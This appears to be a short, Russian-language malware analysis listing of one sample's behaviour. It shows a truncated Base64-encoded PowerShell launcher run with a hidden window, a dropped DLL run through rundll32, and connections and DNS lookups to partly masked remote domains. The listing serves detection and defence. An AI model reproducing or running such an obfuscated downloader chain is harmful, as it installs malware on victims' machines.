Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFADQAYgBuAG8ANABpAD0AKAAnAEEAJwArACgAJwBzACcAKwAnAGgAXwB5ADIAbgAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAcgBwAHIATwBmAEkAbABlAFwAdA...
- %HOMEPATH%\tfvs26b\aw489pe\rkfboo27c.dll
- 'be######ologeraacharyji.com':443
- 'th####enlady.org':443
- 'vo####reight.co.za':443
- '14#.#64.126.197':443
- DNS ASK be######ologeraacharyji.com
- DNS ASK th####enlady.org
- DNS ASK vi#####aitibagari.com
- DNS ASK vo####reight.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFADQAYgBuAG8ANABpAD0AKAAnAEEAJwArACgAJwBzACcAKwAnAGgAXwB5ADIAbgAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAcgBwAHIATwBmAEkAbABlAFwAdA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Tfvs26b\Aw489pe\Rkfboo27c.dll 0